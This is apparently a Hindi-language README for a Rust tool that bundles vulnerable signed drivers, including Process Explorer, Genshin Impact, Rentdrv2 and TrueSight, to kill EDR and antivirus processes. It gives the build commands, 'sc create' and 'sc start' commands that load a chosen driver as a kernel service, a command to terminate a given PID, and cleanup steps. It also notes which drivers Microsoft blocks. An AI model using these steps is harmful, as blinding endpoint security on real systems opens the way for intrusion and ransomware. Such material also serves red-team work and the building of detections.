
BYOVD संग्रह
यह प्रोजेक्ट BYOVD संग्रह है जिसका फोकस EDR / AV प्रक्रियाओं को समाप्त करने पर है।
वर्तमान में निम्नलिखित ड्राइवर समर्थित हैं:
| ड्राइवर | आर्गुमेंट नाम | अवरुद्ध |
|---|
| Process Explorer | process_explorer | हाँ |
| Genshin Impact | genshin | हाँ |
| Rentdrv2 | rentdrv2 | नहीं |
| TrueSight | truesight | नहीं |
अवरुद्ध का अर्थ है कि ड्राइवर Microsoft की ब्लॉक सूची में है और इसे अपडेटेड Windows पर निष्पादित नहीं किया जा सकता।
cargo build --release
rusty_drivers.exe --help
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>
Options:
-p, --pid <PID>
-d, --driver <DRIVER>
-h, --help Print help
-V, --version Print version
चूँकि एक्ज़िक्यूटेबल ड्राइवर का शोषण करने के लिए सेवा पंजीकृत नहीं करता, इसे मैन्युअल रूप से करने की आवश्यकता है:
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto
उसके बाद सेवा शुरू की जा सकती है:
sc start Test123
अंत में, Process Explorer ड्राइवर का उपयोग करके PID 1234 वाली प्रक्रिया को बंद करने के लिए निम्न कमांड का उपयोग किया जा सकता है:
rusty_drivers.exe --pid 1234 --driver process_explorer
बाद में सेवा को साफ़ करना न भूलें:
sc stop Test123
sc delete Test123